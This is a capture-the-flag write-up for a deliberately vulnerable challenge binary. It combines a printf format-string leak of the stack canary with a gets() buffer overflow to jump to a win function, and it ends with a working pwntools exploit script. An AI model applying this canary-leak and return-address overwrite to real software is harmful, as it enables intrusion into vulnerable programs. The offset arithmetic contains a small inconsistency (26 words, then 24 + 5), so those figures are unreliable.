canarywharf | 04/20/26

Description

We found a secret EvilCorp terminal, guarded by a viscous stack canary. Use your hacking knowledge to avoid the canary and find the flag!

To follow along with the challenge, download the binary here.

Observations

For this challenge, all we're given is the binary (ELF) file. To start, we should see what kind of binary we're working with:

[pwn@h4x0r-b0x]% checksec canarywharf
[*] '/home/pwn/canarywharf'
    Arch:       i386-32-little
    RELRO:      No RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

First the good news: we're dealing with a very old architecture (i386-32) which has a pretty simple calling convention, so hopefully the code will be easy to look through. Also, we know ASLR is disabled because of the No PIE, which is nice! Finally, this binary isn't stripped, which should make it much easier to figure out what it's doing!

Unfortunately, it looks like stack canaries are enabled like the challenge description indicated. This will make ROP-style attacks harder, but hopefully we can find a way to leak the canary if we need to perform any buffer overflows that extend past the local variable section of a stack frame.

We can also run strings to quickly scan for interesting things in the binary. Note I've truncated some uninteresting output with the ellipses:

[pwn@h4x0r-b0x]% strings canarywharf
__gmon_start__
flag.txt
flag.txt not found.
*** ACCESS GRANTED ***
Flag: %s
[SECURITY TERMINAL v1.3]
...
printf@GLIBC_2.0
strcspn@GLIBC_2.0
fflush@GLIBC_2.0
stderr@GLIBC_2.0
vuln
fgets@GLIBC_2.0
_edata
fclose@GLIBC_2.1
_fini
__stack_chk_fail@GLIBC_2.4
...

This doesn't tell us a whole ton, but there's an vuln symbol mixed in with a bunch of function names that could be interesting. There's also a flag.txt that it looks like the program is prepared to open and print.

With that in mind, it's time to look through the binary. This is a pretty small one, so I'll be sticking with objdump, but Ghidra/Binary Ninja could be helpful for players who're less comfortable reading assembly. Let's start with our main function:

08049422 <main>:
 ...
 8049452: 6a 00                         pushl   $0x0
 8049454: 6a 02                         pushl   $0x2
 8049456: 6a 00                         pushl   $0x0
 8049458: 50                            pushl   %eax
 8049459: e8 72 fc ff ff                calll   0x80490d0 <setvbuf@plt>
 804945e: 83 c4 10                      addl    $0x10, %esp
 8049461: 8b 83 f0 ff ff ff             movl    -0x10(%ebx), %eax
 8049467: 8b 00                         movl    (%eax), %eax
 8049469: 6a 00                         pushl   $0x0
 804946b: 6a 02                         pushl   $0x2
 804946d: 6a 00                         pushl   $0x0
 804946f: 50                            pushl   %eax
 8049470: e8 5b fc ff ff                calll   0x80490d0 <setvbuf@plt>
 8049475: 83 c4 10                      addl    $0x10, %esp
 8049478: 8b 83 f8 ff ff ff             movl    -0x8(%ebx), %eax
 804947e: 8b 00                         movl    (%eax), %eax
 8049480: 6a 00                         pushl   $0x0
 8049482: 6a 02                         pushl   $0x2
 8049484: 6a 00                         pushl   $0x0
 8049486: 50                            pushl   %eax
 8049487: e8 44 fc ff ff                calll   0x80490d0 <setvbuf@plt>
 804948c: 83 c4 10                      addl    $0x10, %esp
 804948f: e8 39 fe ff ff                calll   0x80492cd <vuln>
 ...

It looks like there isn't really much going on here. There's some initialization with the setvbuf function, but the most interesting part is calling vuln at 804948f. That function will likely be more interesting!

Getting the Flag

Before we look at that, though, it would be helpful to know what our final goal is. There's a win symbol in objdump's output which will likely help us figure that out:

080491f2 <win>:
 ...
 80491fc: e8 2f ff ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 8049201: 81 c3 1b 21 00 00             addl    $0x211b, %ebx           # imm = 0x211B
 ...
 8049215: 8d 83 ec ec ff ff             leal    -0x1314(%ebx), %eax
 804921b: 50                            pushl   %eax
 804921c: 8d 83 ee ec ff ff             leal    -0x1312(%ebx), %eax
 8049222: 50                            pushl   %eax
 8049223: e8 b8 fe ff ff                calll   0x80490e0 <fopen@plt>
 8049228: 83 c4 10                      addl    $0x10, %esp
 804922b: 89 85 70 ff ff ff             movl    %eax, -0x90(%ebp)
 8049231: 83 bd 70 ff ff ff 00          cmpl    $0x0, -0x90(%ebp)
 8049238: 75 1c                         jne 0x8049256 <win+0x64>
 ...
 8049256: 83 ec 04                      subl    $0x4, %esp
 8049259: ff b5 70 ff ff ff             pushl   -0x90(%ebp)
 804925f: 68 80 00 00 00                pushl   $0x80
 8049264: 8d 85 74 ff ff ff             leal    -0x8c(%ebp), %eax
 804926a: 50                            pushl   %eax
 804926b: e8 10 fe ff ff                calll   0x8049080 <fgets@plt>
 8049270: 83 c4 10                      addl    $0x10, %esp
 8049273: 83 ec 0c                      subl    $0xc, %esp
 8049276: ff b5 70 ff ff ff             pushl   -0x90(%ebp)
 804927c: e8 0f fe ff ff                calll   0x8049090 <fclose@plt>
 8049281: 83 c4 10                      addl    $0x10, %esp
 8049284: 83 ec 0c                      subl    $0xc, %esp
 8049287: 8d 83 0b ed ff ff             leal    -0x12f5(%ebx), %eax
 804928d: 50                            pushl   %eax
 804928e: e8 1d fe ff ff                calll   0x80490b0 <puts@plt>
 8049293: 83 c4 10                      addl    $0x10, %esp
 8049296: 83 ec 08                      subl    $0x8, %esp
 8049299: 8d 85 74 ff ff ff             leal    -0x8c(%ebp), %eax
 804929f: 50                            pushl   %eax
 80492a0: 8d 83 23 ed ff ff             leal    -0x12dd(%ebx), %eax
 80492a6: 50                            pushl   %eax
 80492a7: e8 94 fd ff ff                calll   0x8049040 <printf@plt>
 80492ac: 83 c4 10                      addl    $0x10, %esp
 80492af: 8b 83 fc ff ff ff             movl    -0x4(%ebx), %eax
 80492b5: 8b 00                         movl    (%eax), %eax
 80492b7: 83 ec 0c                      subl    $0xc, %esp
 80492ba: 50                            pushl   %eax
 80492bb: e8 a0 fd ff ff                calll   0x8049060 <fflush@plt>
 80492c0: 83 c4 10                      addl    $0x10, %esp
 80492c3: 83 ec 0c                      subl    $0xc, %esp
 80492c6: 6a 00                         pushl   $0x0
 80492c8: e8 f3 fd ff ff                calll   0x80490c0 <exit@plt>

Given the strings output we saw earlier, it seems likely that these fopen, fgets, and printf function calls will open flag.txt and print its contents out for us.

Statically validating that win really does print the flag

We can validate that this function really does print flag.txt by checking the values stored at the pointers that're passed into fopen and printf. Since ASLR is disabled, this is pretty easy to do:

Both pointers we're interested in (highlighted leal lines above) point to specific offsets from %ebx. To calculate their absolute addresses, we first need to know the base address stored in %ebx. This value is set near the top of the function with the instructions:
```
80491fc: e8 2f ff ff ff                 calll   0x8049130 <__x86.get_pc_thunk.bx>
8049201: 81 c3 1b 21 00 00              addl    $0x211b, %ebx           # imm = 0x211B
```
__x86.get_pc_thunk.bx is a function that just loads %eip into %ebx so that the program can calculate offsets based on this. Programs can't directly access %eip, so __x86.get_pc_thunk.bx takes advantage of the return address on the stack to read its value in the calling function.

In this case, that means that before 8049201 executes, %ebx will have a value of 0x80491fc. That addl instruction adds 0x211b to create our final base address.

Doing this math gives us a base address 0x80491fc + 0x211b = 0x804b3ef.
Now that we have this base address, we just need to calculate the offsets generated by the instructions at 8049215 and 80492a0:
- 0x804b3ef - 0x1314 = 0x804a0db
- 0x804b3ef - 0x12dd = 0x804a112

Strings like this are usually stored in the .rodata segment, so we can use objdump to inspect that segment and look for the addresses we've identified.

[pwn@h4x0r-b0x]% objdump -s -j .rodata canarywharf

canarywharf:    file format elf32-i386
Contents of section .rodata:
 804a000 03000000 01000200 7200666c 61672e74  ........r.flag.t
 804a010 78740066 6c61672e 74787420 6e6f7420  xt.flag.txt not 
 804a020 666f756e 642e000a 2a2a2a20 41434345  found...*** ACCE
 804a030 53532047 52414e54 4544202a 2a2a0046  SS GRANTED ***.F
 804a040 6c61673a 2025730a 000a5b53 45435552  lag: %s...[SECUR
 804a050 49545920 5445524d 494e414c 2076312e  ITY TERMINAL v1.
 804a060 335d003d 3d3d3d3d 3d3d3d3d 3d3d3d3d  3].=============
 804a070 3d3d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d00  ===============.
 804a080 456e7465 7220796f 75722075 7365726e  Enter your usern
 804a090 616d653a 20000a00 48656c6c 6f2c2000  ame: ...Hello, .
 804a0a0 21000a45 6e746572 20616363 65737320  !..Enter access 
 804a0b0 636f6465 3a200041 63636573 73206465  code: .Access de
 804a0c0 6e696564 2e00                        nied..

Sure enough, fopen is given the string "flag.txt" and printf is given the string "Flag: %s."!

Looking through the disassembly, it doesn't look like there are any places where win is called. Instead, it looks like this is a ret2win challenge where we'll need to overwrite some return address to jump to win without modifying the canary that guards it.

Leaking Memory

Now that we know we'll need to overwrite a return pointer without disturbing the corresponding canary, we need to find a way to gain access to the canary's value. If we can find a way to do this, we can overwrite the canary with itself to avoid tripping the alarm and terminating the program while exploiting a buffer overflow to modify a function's return address.

One common way this can be done is by passing malicious input to printf. There are enough powerful format specifiers that, if we can control the format string (first argument), we can leak almost any memory we want. As noted earlier, the only hardcoded string with a format specifier in it is the one to print the flag. By looking for other uses of printf, we can hopefully find a spot where an attacker-controlled string is used as its first argument.

As it turns out, the vuln function uses printf quite a bit:

080492cd <vuln>:
 ...
 804930e: 83 ec 0c                      subl    $0xc, %esp
 8049311: 8d 83 64 ed ff ff             leal    -0x129c(%ebx), %eax
 8049317: 50                            pushl   %eax
 8049318: e8 23 fd ff ff                calll   0x8049040 <printf@plt>
 ...
 804932c: e8 2f fd ff ff                calll   0x8049060 <fflush@plt>
 8049331: 83 c4 10                      addl    $0x10, %esp
 8049334: 8b 83 f8 ff ff ff             movl    -0x8(%ebx), %eax
 804933a: 8b 00                         movl    (%eax), %eax
 804933c: 83 ec 04                      subl    $0x4, %esp
 804933f: 50                            pushl   %eax
 8049340: 6a 20                         pushl   $0x20
 8049342: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049345: 50                            pushl   %eax
 8049346: e8 35 fd ff ff                calll   0x8049080 <fgets@plt>
 ...
 8049364: c6 44 05 94 00                movb    $0x0, -0x6c(%ebp,%eax)
 8049369: 83 ec 0c                      subl    $0xc, %esp
 804936c: 8d 83 7c ed ff ff             leal    -0x1284(%ebx), %eax
 8049372: 50                            pushl   %eax
 8049373: e8 c8 fc ff ff                calll   0x8049040 <printf@plt>
 8049378: 83 c4 10                      addl    $0x10, %esp
 804937b: 83 ec 0c                      subl    $0xc, %esp
 804937e: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049381: 50                            pushl   %eax
 8049382: e8 b9 fc ff ff                calll   0x8049040 <printf@plt>
 ...
 80493b0: 83 ec 0c                      subl    $0xc, %esp
 80493b3: 8d 83 86 ed ff ff             leal    -0x127a(%ebx), %eax
 80493b9: 50                            pushl   %eax
 80493ba: e8 81 fc ff ff                calll   0x8049040 <printf@plt>
 ...
 8049421: c3                            retl

Looking at the arguments to these printf invocations, the third one takes a local variable -0x6c(%ebp) as its format string instead of a pointer to .rodata! This is a promising sign for allowing us to control its value. Looking further, this address is also the destination address for fgets to write to! This means anything we pass in to STDIN will get sent to printf as the format specifier! There are a number of ways we could potentially use this to aid our attack.

Overflowing a Buffer

Now that we can leak memory using printf, we need to know what memory is useful to leak. Obviously we want to leak a canary, but each function invokation gets its own canary. The only canary we really care about is the one that protects the return address that we will replace with win's address. To figure out which one this is, we need to find a buffer overflow vulnerability that allows us to overwrite the return address of the function it's located in.

While the fgets call we just looked at allows attacker control over the printf format specifier, it does not allow attacker control over the stack. It's bounded to read at most 32 characters and -0x6c(%ebp) + 0x20 is nowhere near 0x4(%ebp) where vuln's return address is.

Thankfully, though, the call graph for this program is super simple. There are only 3 functions defined: main, which calls vuln, and win, which is never called. Since win is never called, the vulnerability can't be there. main just does some setup that doesn't allow room for an attack, so the vulnerability can't be there. By process of elimination, there must be another vulnerability in vuln that allows a buffer overflow.

Sure enough, further on in the function is another call to read from STDIN:

080492cd <vuln>:
 ...
 80493b0: 83 ec 0c                      subl    $0xc, %esp
 80493b3: 8d 83 86 ed ff ff             leal    -0x127a(%ebx), %eax
 80493b9: 50                            pushl   %eax
 80493ba: e8 81 fc ff ff                calll   0x8049040 <printf@plt>
 80493bf: 83 c4 10                      addl    $0x10, %esp
 80493c2: 8b 83 fc ff ff ff             movl    -0x4(%ebx), %eax
 80493c8: 8b 00                         movl    (%eax), %eax
 80493ca: 83 ec 0c                      subl    $0xc, %esp
 80493cd: 50                            pushl   %eax
 80493ce: e8 8d fc ff ff                calll   0x8049060 <fflush@plt>
 80493d3: 83 c4 10                      addl    $0x10, %esp
 80493d6: 83 ec 0c                      subl    $0xc, %esp
 80493d9: 8d 45 b4                      leal    -0x4c(%ebp), %eax
 80493dc: 50                            pushl   %eax
 80493dd: e8 8e fc ff ff                calll   0x8049070 <gets@plt>

The gets function is deprecated because its lack of bounds checking make it an unsafe function. This means we have unbounded write access to the stack from STDIN when this function is called!

Exploit

Leaking the Canary

Now that we know vuln contains both a vulnerability to leak memory and a vulnerability to overwrite data on the stack, it's clear that we can use these to overwrite vuln's return address while preserving the canary. Next, we need to figure out where the canary is in the stack so we can ensure it's preserved when we overwrite the stack frame.

Our specific method for leaking memory from the stack will be using the "%X$p" format specifier, where X is replaced by an integer. This format specifier's purpose is printing an argument passed to the printf by index (for example, "%7$p" prints the 7th argument). Since the C ABI for the i386 architecture passes all function arguments on the stack, specifying larger numbers than there are arguments to printf means that data further up the stack will be printed instead. Rather than knowing the exact memory address of the canary, we just need to figure out what offset to replace X with in this specifier.

We can get a rough idea for where this is via static analysis. This format specifier assumes arguments are 4-byte aligned, which means incrementing X will print a 4-byte word that's 4 bytes earlier in memory each time. Looking at the stack setup code for vuln, we can see that the stack canary (-0xc(%ebp)) is 104 bytes (26 4-byte words) from the top of the stack frame in vuln:

080492cd <vuln>:
 80492cd: 55                            pushl   %ebp
 80492ce: 89 e5                         movl    %esp, %ebp
 80492d0: 53                            pushl   %ebx
 80492d1: 83 ec 74                      subl    $0x74, %esp
 80492d4: e8 57 fe ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 80492d9: 81 c3 43 20 00 00             addl    $0x2043, %ebx           # imm = 0x2043
 80492df: 65 a1 14 00 00 00             movl    %gs:0x14, %eax
 80492e5: 89 45 f4                      movl    %eax, -0xc(%ebp)
 ...

However, this doesn't consider the extra data that will be pushed to the stack when calling printf. This additional data includes any arguments passed to printf:

080492cd <vuln>:
 ...
 804937e: 8d 45 94                      leal    -0x6c(%ebp), %eax
 8049381: 50                            pushl   %eax
 8049382: e8 b9 fc ff ff                calll   0x8049040 <printf@plt>

In this case, there's just a 4-byte word for the pointer to the format string. Then, the return address is implicitly pushed onto the stack. printf lives in the C stdlib, so we don't have direct access to it to verify how much else gets pushed onto the stack. However, based on the ABI for i386 with stack canaries enabled, we can infer that it also pushes

%ebp
%ebx, and
A stack canary

for a total of 5 additional 4-byte words above vuln's stack frame. This means that the stack canary is can be accessed as argument $24 + 5 = 31$ of printf via "%31$p".

Overwriting the Return Address

Now that we can perform a buffer overflow and have a way to get the stack canary for the function where this overflow vulnerability is, we just need to figure out the offsets for overwriting the canary and the return address in order to jump to win and get the flag! Looking back at the relevant parts of vuln, we can find the relevant addresses for calculating these offsets:

080492cd <vuln>:
 80492cd: 55                            pushl   %ebp
 80492ce: 89 e5                         movl    %esp, %ebp
 80492d0: 53                            pushl   %ebx
 80492d1: 83 ec 74                      subl    $0x74, %esp
 80492d4: e8 57 fe ff ff                calll   0x8049130 <__x86.get_pc_thunk.bx>
 80492d9: 81 c3 43 20 00 00             addl    $0x2043, %ebx           # imm = 0x2043
 80492df: 65 a1 14 00 00 00             movl    %gs:0x14, %eax
 80492e5: 89 45 f4                      movl    %eax, -0xc(%ebp)
 ...
 80493d6: 83 ec 0c                      subl    $0xc, %esp
 80493d9: 8d 45 b4                      leal    -0x4c(%ebp), %eax
 80493dc: 50                            pushl   %eax
 80493dd: e8 8e fc ff ff                calll   0x8049070 <gets@plt>

Our write access to the stack starts at -0x4c(%ebp), so we will need to overwrite $\mathtt{0x40} = 64$ bytes to reach the stack canary at -0xc(%ebp). Then, after writing the canary, we'll need to overwrite 12 more bytes to each the return address at 0x4(%ebp). Finally, looking back at the disassembly of win, we need to write 0x080491f2 onto the stack so that retl will jump to win and print the flag.

Scripting a Solution

Putting this all together, we can write a short script using pwntools to perform this attack:

from pwn import *

p = remote('canarywharf.ctf-league.damsec.org', 1309)

p.sendline(b"%31$p")
p.recvuntil(b"Hello, ")         # Throw away the stuff before the start of the canary
res = p.recvuntil(b"!")[:-1]    # Grab the canary and discard the stuff that comes after
canary = int(res, 16)           # Convert the canary from a hex string to decimal number

p.recvuntil('access code:')
p.sendline(
    b"A"*64 +       # Initial 64 bytes of garbage
    p32(canary) +   # Canary value to avoid overwriting
    b'A'*12 +       # 12 bytes of additional garbage
    p32(0x080491f2) # Address of `win`
)
p.interactive()

Conclusion

Stack canaries make buffer overflows much more difficult to exploit! Instead of just identifying a buffer overflow and overwriting memory, attackers have to also find a way to leak memory and identify the canary to avoid tripping the stack protection guards and killing the program they're attempting to exploit. Just like ASLR, this is a powerful, low-cost method for increasing safety that you should think long and hard about before disabling.